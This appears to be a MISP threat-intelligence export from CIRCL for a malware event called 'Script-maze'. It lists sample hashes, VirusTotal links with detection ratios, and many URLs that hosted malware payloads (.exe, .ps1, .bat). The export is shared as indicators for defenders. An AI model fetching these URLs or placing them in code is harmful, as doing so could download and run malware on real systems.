{
|
|
"Event": {
|
|
"analysis": "1",
|
|
"date": "2019-05-26",
|
|
"extends_uuid": "",
|
|
"info": "Script-maze historical malware seen",
|
|
"publish_timestamp": "1558859877",
|
|
"published": true,
|
|
"threat_level_id": "3",
|
|
"timestamp": "1558859858",
|
|
"uuid": "5cea4d65-d448-4e7c-af4a-4fe3950d210f",
|
|
"Orgc": {
|
|
"name": "CIRCL",
|
|
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
|
|
},
|
|
"Tag": [
|
|
{
|
|
"colour": "#004646",
|
|
"local": false,
|
|
"name": "type:OSINT",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0071c3",
|
|
"local": false,
|
|
"name": "osint:lifetime=\"perpetual\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0087e8",
|
|
"local": false,
|
|
"name": "osint:certainty=\"50\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#ffffff",
|
|
"local": false,
|
|
"name": "tlp:white",
|
|
"relationship_type": ""
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-f9e0-4c71-ab29-2a8d950d210f",
|
|
"value": "ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-1624-4a75-bfb1-2a8d950d210f",
|
|
"value": "6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-28f8-454f-9c29-2a8d950d210f",
|
|
"value": "fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-4dc4-4313-94f7-2a8d950d210f",
|
|
"value": "968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-2750-40d2-be58-2a8d950d210f",
|
|
"value": "58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-3444-4e63-b177-2a8d950d210f",
|
|
"value": "2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-8490-4f28-8174-2a8d950d210f",
|
|
"value": "65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-5fd0-44b4-9fe2-2a8d950d210f",
|
|
"value": "84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5cea4d6d-5410-4c49-ab62-2a8d950d210f",
|
|
"value": "b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859335",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4e47-d544-4169-8690-47b5950d210f",
|
|
"value": "http://74.222.1.38:8888/close.bat"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859694",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "5cea4fae-4d38-4905-acc7-438e950d210f",
|
|
"value": "4d437b5614edcc7d1ee5e4bcf5785ef9"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-bbc8-4e1d-85d3-4391950d210f",
|
|
"value": "http://wmi.1217bye.host/2.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-13b8-4e59-b16c-4d59950d210f",
|
|
"value": "http://173.247.239.186/ok.exe"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-4038-44f6-997e-45ec950d210f",
|
|
"value": "http://173.247.239.186/upsupx.exe"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-9f64-4154-9ea8-4b50950d210f",
|
|
"value": "http://173.247.239.186/u.exe"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-5828-4649-91d3-492e950d210f",
|
|
"value": "http://45.58.135.106/xpdown.dat"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-a7fc-49a8-80cb-4948950d210f",
|
|
"value": "http://45.58.135.106/ok/down.html"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-af8c-402c-be36-426a950d210f",
|
|
"value": "http://45.58.135.106/ok/64.html"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-2738-414a-9d19-43cf950d210f",
|
|
"value": "http://223.25.247.240/ok/ups.html"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-9a74-4407-927f-4df9950d210f",
|
|
"value": "http://45.58.135.106/ok/vers.html"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-cff8-4e3b-a350-42a9950d210f",
|
|
"value": "http://45.58.135.106/kill.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-4bcc-45be-a51a-404a950d210f",
|
|
"value": "http://wmi.1217bye.host/S.ps1"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-24d8-45be-8a89-4940950d210f",
|
|
"value": "http://173.208.139.170/s.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-83a0-4e47-a433-4b92950d210f",
|
|
"value": "http://35.182.171.137/l.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-f990-4ded-887d-497e950d210f",
|
|
"value": "http://74.222.1.38/up.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859765",
|
|
"to_ids": false,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-3614-4936-adaa-470f950d210f",
|
|
"value": "http://2019.ip138.com/ic.asp"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-9268-41e9-ab92-49f9950d210f",
|
|
"value": "http://45.58.135.106/downs.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-4488-40f1-8920-4e1a950d210f",
|
|
"value": "http://185.112.156.92/downs.exe"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-a3d8-4c30-86d5-4959950d210f",
|
|
"value": "http://66.117.6.174/ups.rar"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "downloaded by 4d437b5614edcc7d1ee5e4bcf5785ef9",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859734",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4fd6-d2f8-46ec-9c24-4b42950d210f",
|
|
"value": "http://198.148.90.34/b.exe"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1558859814",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea5026-2614-4801-98d5-41c8950d210f",
|
|
"value": "http://down.0814ok.info:8888/"
|
|
}
|
|
],
|
|
"Object": [
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859150",
|
|
"uuid": "380c7782-2dd4-443a-9108-bf700a7d0b43",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "380c7782-2dd4-443a-9108-bf700a7d0b43",
|
|
"referenced_uuid": "7e77557c-59e5-421e-9ac1-7d8d4d7dc322",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859152",
|
|
"uuid": "5cea4d90-1600-4db1-ba50-43af950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "940587bc-ccde-402c-8de9-9e4271d239f3",
|
|
"value": "b0b34b3a52b31e001b0582a70cad2aa2"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "f7c266b7-ef28-4f1d-adf9-f9712678f648",
|
|
"value": "de1318abdb0f202181c360d933ea543b2b8c85dd"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "1e93ba14-952d-43ca-a633-2772e2e07d3b",
|
|
"value": "ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859150",
|
|
"uuid": "7e77557c-59e5-421e-9ac1-7d8d4d7dc322",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "6bb41516-4b77-4319-9bd1-2ecc84212902",
|
|
"value": "2019-05-23T00:40:50"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "e1a0aedc-fef3-47ac-96bf-1346a0917178",
|
|
"value": "https://www.virustotal.com/file/ae09d6030fee8e68f120faedad9394ea2aa12c7546fd515144588ce40a423de9/analysis/1558572050/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "81466fe0-9b85-43b0-8734-8abf874f6430",
|
|
"value": "1/57"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859150",
|
|
"uuid": "94dcbf47-d0d9-4e9e-b48f-c7b6fcc019b2",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "94dcbf47-d0d9-4e9e-b48f-c7b6fcc019b2",
|
|
"referenced_uuid": "550f6b80-a32c-41d9-93c4-db9c41528a0b",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859152",
|
|
"uuid": "5cea4d90-fe08-4a53-942d-411c950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "1c6f7c31-6784-44ba-a232-0d7832de0ae7",
|
|
"value": "b340e1cdf15eb702ed14e05b42163910"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "3d8dc364-12d6-4ce2-81bd-f92f3c9d809a",
|
|
"value": "9aafb2147de42cea11d6e798721554ba456f34e8"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "49f41045-340c-42c6-af63-180f7b0006a4",
|
|
"value": "fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859150",
|
|
"uuid": "550f6b80-a32c-41d9-93c4-db9c41528a0b",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "ba54ef1f-42d0-4d51-b3a8-55af788d40f7",
|
|
"value": "2019-02-24T00:01:11"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "f569b93d-067a-4d0d-85dd-4d9c568fb189",
|
|
"value": "https://www.virustotal.com/file/fd8dbf9077160d59d23b70c7fbe6a19d18aeef86e62f180ad6bedde714d6b2f9/analysis/1550966471/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "ff3e5153-e691-4326-b9b7-1ce6b44633e0",
|
|
"value": "1/51"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859150",
|
|
"uuid": "b58ad199-5bc6-4892-b6ea-1758b79ea763",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "b58ad199-5bc6-4892-b6ea-1758b79ea763",
|
|
"referenced_uuid": "57dc22c7-3d93-437a-9930-7312a8472014",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859152",
|
|
"uuid": "5cea4d90-cb98-4a37-937c-4804950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "0efb06f7-be0f-461a-88e2-582f603f2737",
|
|
"value": "942a3b5532bd6e4bdfea13cf077dded5"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "74dd6bfe-c595-4d82-8082-663908974de2",
|
|
"value": "5eea109a6d3f5f521a82bdff2532dec5f376e071"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "11442f89-278e-48fc-bf4e-9afb04fb3feb",
|
|
"value": "84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859151",
|
|
"uuid": "57dc22c7-3d93-437a-9930-7312a8472014",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "1dc2c7b3-c04b-4a28-b258-580b4e22057b",
|
|
"value": "2018-07-03T21:19:21"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "3fcfec4a-4286-4ab7-b3a1-e502fabfaf8d",
|
|
"value": "https://www.virustotal.com/file/84957a0628a96a7e69ecfafe14f2cc475b6085f445ac69ac71d97bc877c36088/analysis/1530652761/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "3118f2c7-2fed-4e23-b896-d0dbb81ac716",
|
|
"value": "18/57"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859151",
|
|
"uuid": "b2749b84-7bae-418b-b58a-278ee29eefea",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "b2749b84-7bae-418b-b58a-278ee29eefea",
|
|
"referenced_uuid": "bf3c1c50-d629-446c-a802-a541481256f3",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859152",
|
|
"uuid": "5cea4d90-dae4-416c-83c0-4162950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "22eb9fd9-af68-43ae-a557-0233544a6c29",
|
|
"value": "f2e4361d57eef76cbc5727245fe402f8"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "edddbb5b-5c03-4fed-a138-2999dafd8867",
|
|
"value": "c58b5aa5728e8bf381470ad89d234463cd992937"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "b92cf7e4-c5eb-4ef0-8518-0fb1e0d63ecd",
|
|
"value": "2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859151",
|
|
"uuid": "bf3c1c50-d629-446c-a802-a541481256f3",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "f7719a96-7a86-419d-b29f-e622a275a9bb",
|
|
"value": "2019-03-15T00:02:54"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "94c66b94-2553-4cd0-adac-de1f210c5ac5",
|
|
"value": "https://www.virustotal.com/file/2aa3afefa71270d54ae05aa46fa6441c346abb1a55bd204dc3ca4b5a3548c830/analysis/1552608174/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "f14e3ba7-10ba-43fb-b70b-bca1f43972d8",
|
|
"value": "16/55"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859151",
|
|
"uuid": "7eab9890-1152-4540-b14c-b1713dd74db7",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "7eab9890-1152-4540-b14c-b1713dd74db7",
|
|
"referenced_uuid": "4a5526a0-66ef-4a36-859c-9fae1cf3a73e",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859153",
|
|
"uuid": "5cea4d91-d694-445d-85b2-4cfb950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "ac059130-8c83-4f2a-a720-f3aabe1ab1c2",
|
|
"value": "4be50da2219f8dc41f46e7844e265e87"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "c6b9ef10-9f62-4de8-978d-ba8d2799fcc9",
|
|
"value": "c2ab04184e75649fdf85165fffd02f1f8c4c8bba"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "12d14b02-5b03-4f09-ab9c-936609698bee",
|
|
"value": "b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
